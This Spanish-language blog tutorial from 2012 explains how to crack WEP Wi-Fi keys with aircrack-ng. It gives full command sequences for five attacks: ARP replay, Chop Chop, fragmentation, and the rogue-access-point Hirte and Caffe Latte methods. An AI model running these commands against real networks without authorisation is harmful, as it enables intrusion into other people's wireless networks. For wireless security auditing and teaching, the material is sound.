jueves, 19 de enero de 2012

Cifrado WEP

Cifrado WEP


>>>>> Información WEP (Wikipedia):



Ataque 1 + 3

Partimos de tener nuestra tarjeta en modo monitor, con lo que ahora pasará a ser mon0.
  1.  Buscamos la red objetivo con airodump-ng :sintaxisairodump-ng <interfaz en modo monitor>
    1. airodump-ng mon0
           

      Analicemos ahora lo que vemos en la captura:
      BSSID : La dirección MAC del AP (punto de acceso).
      PWR : La intensidad de señal que recibimos del AP.
      Beacons : Son tramas no validos para nuestra auditoria de la red.
      #Data : Paquetes de datos válidos, estos son los que nos interesan.
      #/S : Aquí vemos a que ritmo crecen los #Data, es útil para ver a que velocidad estamos inyectando.
      CH : El canal sobre el que opera el AP.
      MB : Velocidad del AP. -- 11 → 802.11b // 54 → 802.11g
      ENC, CIPHER, AUTH : Estos 3 campos están relacionados con la cifrado.
      ESSID: El nombre del AP.

  2. Nuestro objetivo será la red con ESSID wireless, pero antes de continuar probaremos si nuestra tarjeta puede inyectar en el AP:
    sintaxisaireplay-ng -9 -b <BSSID del AP> -e <ESSID del AP> <interfaz>


  3. Una vez comprobado que podemos inyectar procederemos a capturar el trafico de la red objetivo con airodump-ng:
  4. sintaxis airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del archivo donde se guardaran la captura> <interfaz>

    airodump-ng --bssid 00:11:22:33:44:55 -c 11 -w captura mon0












  5. Ahora ya tenemos airodump-ng capturando trafico para un AP especifico, nuestro siguiente paso sera asociarnos al punto de acceso, para ello abrimos otra terminal y lanzamos aireplay-ng:

  6. sintaxis → aireplay -ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a <BSSID del AP> -h <nuestra mac> <interfaz>

    aireplay-ng -1 10 -e wireless -a 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff mon0









  7. Una vez ya estemos asociados (la carita sonriente :-) de la imagen anterior nos lo confirmará), podemos inyectar tráfico para aumentar los #Data capturados con airodump-ng (punto 3) con el fin de poder obtener la contraseña más rápido. Para este cometido volveremos a utilizar aireplay-ng (en otra terminal):
    sintaxis → aireplay -ng -3 -x <velocidad de inyección> -b <BSSID del AP> -h <nuestra mac> <interfaz>


  8. aireplay-ng -3 -x 300 -b 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff mon0









  9. Lo siguiente será ver como en la terminal con el airodump-ng aumentan de forma rápida los #Data (puede tardar un rato en empezar la inyección):


  10. y también veremos en la terminal del aireplay-ng -3 los ARP aumentar:











    1. Una vez tengamos entre más de 20000 #Data podemos empezar a descifrar la clave con aircrack-ng:
  11. sintaxis aircrack-ng <archivo captura .cap>

    aircrack-ng captura.cap




    RESUMEN 1 + 3



    1. airmon-ng start <interfaz de red>
    2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del archivo donde se guardaran la captura> <interfaz>
    3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a <BSSID del AP> -h <nuestra mac> <interfaz>
    4. aireplay-ng -3 -x <velocidad de inyección> -b <BSSID del AP> -h <nuestra mac> <interfaz>
    5. aircrack-ng <archivo captura .cap>



Ataque Chop Chop

Partimos de tener nuestra tarjeta en modo monitor, con lo que ahora pasará a ser mon0, además de tener airodump-ng capturando (opción -w incluida para guardar los datos capturados) y con aireplay-ng -1 funcionando y asociándonos al AP.
A partir de aquí:
  1.  Abrimos una terminal y lanzamos el ataque Chop Chop con aireplay-ng:
    sintaxisaireplay-ng -4 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
aireplay-ng -4 -b 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff mon0

esperamos a que encuentre un paquete válido y nos preguntará:
Use this packet?
Entonces contestamos “yes”:


Ahora esperamos un poco y creará un nuevo archivo .cap y un archivo .xor con lo que aparecerá esto:
  1. A continuación ejecutamos tcpdump sobre el archivo .cap generado antes:
    sintaxistcpdump -s 0 -n -e -r <archivo .cap generado antes>

    tcpdump -s 0 -n -e -r replay_dec-1015-173905.cap

        Tenemos que prestar atención a la ip que aparece en el texto ya que la utilizaremos ahora.

  1. Forjamos un nuevo paquete de datos con packetforge-ng:
    sintaxis → packetforge-ng -0 -a <MAC del AP> -h <nuestra MAC> -k <ip dentro del rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w <archivo que reinyectaremos>
packetforge-ng -0 -a 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff -k 192.168.1.255 -l 192.168.1.33 -y replay_dec-1015-173905.xor -w arp


      Una vez ponga:
      Wrote packet to: <archivo que reinyectaremos>
      ya hemos completado este paso.

  1. Lo siguiente será reinyectar el paquete creado, para ello nos valdremos de aireplay-ng:
    sintaxis → aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior> <interfaz>
aireplay-ng -2 -h aa:bb:cc:dd:ee:ff -r arp

y pronto veremos como la terminal que teníamos capturando tráfico con airodump-ng empieza a subir rápidamente los #Data:


Por último como en el paso anterior, con más de 20000 #Data lanzaremos aircrack-ng.



RESUMEN CHOP CHOP
  1. airmon-ng start <interfaz de red>
  2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del archivo donde se guardaran la captura> <interfaz>
  3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a <BSSID del AP> -h <nuestra mac> <interfaz>
  4. aireplay-ng -4 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
  5. tcpdump -s 0 -n -e -r <archivo .cap generado antes>
  6. packetforge-ng -0 -a <BSSID del AP> -h <nuestra MAC> -k <ip dentro del rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w <archivo a reinyectar>
  7. aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior> <interfaz>
  8. aircrack-ng <archivo de captura .cap>


Ataque Fragmentación

Este ataque también es más rápido que el ataque 1+3, pero como el ataque chop chop no siempre funciona.

Como en el ataque anterior partimos de tener nuestra tarjeta en modo monitor, con lo que ahora pasará a ser mon0, además de tener airodump-ng capturando (opción -w incluida para guardar los datos capturados) y con aireplay-ng -1 funcionando y asociándonos al AP.
A partir de aquí:

  1. Abrimos una terminal y lanzamos el ataque de Fragmentación:
    sintaxisaireplay-ng -5 -b <BSSID del AP> -h <nuestra MAC> <interfaz>

aireplay-ng -5 -b 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff mon0

esperamos a que encuentre un paquete válido y nos preguntará:
Use this packet?
Entonces contestamos “yes”:
  1. Forjamos un nuevo paquete de datos con packetforge-ng:
    sintaxis → packetforge-ng -0 -a <MAC del AP> -h <nuestra MAC> -k <ip dentro del rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w <archivo que reinyectaremos>
    packetforge-ng -0 -a 00:11:22:33:44:55 -h aa:bb:cc:dd:ee:ff -k 192.168.1.255 -l 192.168.1.33 -y replay_dec-1015-173905.xor -w arp
    Una vez ponga:
    Wrote packet to: <archivo que reinyectaremos>
    ya hemos completado este paso.
  1. Lo siguiente será reinyectar el paquete creado, para ello nos valdremos de aireplay-ng:
    sintaxis → aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior> <interfaz>
    aireplay-ng -2 -h aa:bb:cc:dd:ee:ff -r arp

y pronto veremos como la terminal que teníamos capturando tráfico con airodump-ng empieza a subir rápidamente los #Data:

Por último como en el paso anterior, con más de 20000 #Data lanzaremos aircrack-ng.


RESUMEN FRAGMENTACIÓN

  1. airmon-ng start <interfaz de red>
  2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del archivo donde se guardaran la captura> <interfaz>
  3. aireplay-ng -1 <tiempo entre cada asociación> -e <ESSID del AP> -a <BSSID del AP> -h <nuestra mac> <interfaz>
  4. aireplay-ng -5 -b <BSSID del AP> -h <nuestra MAC> <interfaz>
  5. packetforge-ng -0 -a <BSSID del AP> -h <nuestra MAC> -k <ip dentro del rango> -l <ip obtenida antes> -y <archivo .xor obtenido antes> -w <archivo a reinyectar>
  6. aireplay-ng -2 -h <nuestra MAC> -r <archivo creado en el paso anterior> <interfaz>
  7. aircrack-ng <archivo de captura .cap>


Hirte Attack

Este ataque es distinto a los anteriores y se ejecuta de una forma no muy difícil, pero si diferente. Para realizarlo dependemos de que haya algún cliente conectado al punto de acceso objetivo.

>>>>> Documentacion airbase-ng:
En este ataque partiremos de tener nuestra tarjeta en modo monitor, con lo que ahora pasará a ser mon0, además de tener airodump-ng capturando (opción -w incluida para guardar los datos capturados).
Con esto ya preparado:

  1. Primero crearemos un punto de acceso falso con airbase-ng. Este punto de acceso tendrá el mismo canal y essid que el AP objetivo.
sintaxis → airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> -N -W 1 <interfaz>
airbase-ng -c 11 -e wireless -N -W 1 mon0


lo siguiente será esperar a que el cliente asociado al AP original haga el resto del trabajo “danzando” entre nuestro AP falso y el original con lo que incrementara nuestros #Data.

Al final aircrack-ng será el encargado de descifrar la contraseña con el archivo de captura .cap como en los otros ataques.


RESUMEN HIRTE ATTACK
  1. airmon-ng start <interfaz de red>
  2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del archivo donde se guardaran la captura> <interfaz>
  3. airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> -N -W 1 <interfaz>
  4. aircrack-ng <archivo de captura .cap>


Caffe Latte Attack

Este ataque, al igual que el de fragmentación es distinto a los anteriores y se ejecuta de una forma no muy difícil, pero si diferente. Para realizarlo dependemos de que haya algún cliente conectado al punto de acceso objetivo.
Su ejecución es muy similar a la del Hirte Attack, de hecho su principal diferencia es la forma de inyectar.

En este ataque partiremos de tener nuestra tarjeta en modo monitor, con lo que ahora pasará a ser mon0, además de tener airodump-ng capturando (opción -w incluida para guardar los datos capturados).
Con esto ya preparado:
  1. Primero crearemos un punto de acceso falso con airbase-ng. Este punto de acceso tendrá el mismo canal y essid que el AP objetivo.
sintaxis → airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> -L -W 1 <interfaz>
airbase-ng -c 11 -e wireless -L -W 1 mon0

y como antes, lo siguiente será esperar a que el cliente asociado al AP original haga el resto del trabajo “danzando” entre nuestro AP falso y el original con lo que incrementara nuestros #Data.

Al final aircrack-ng será el encargado de descifrar la contraseña con el archivo de captura .cap como en los otros ataques.


RESUMEN CAFFE LATTE ATTACK
  1. airmon-ng start <interfaz de red>
  2. airodump-ng --bssid <BSSID del AP> -c <canal del AP> -w <nombre del archivo donde se guardaran la captura> <interfaz>
  3. airbase-ng -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> -L -W 1 <interfaz>
  4. aircrack-ng <archivo de captura .cap>



    No hay comentarios:

    Publicar un comentario en la entrada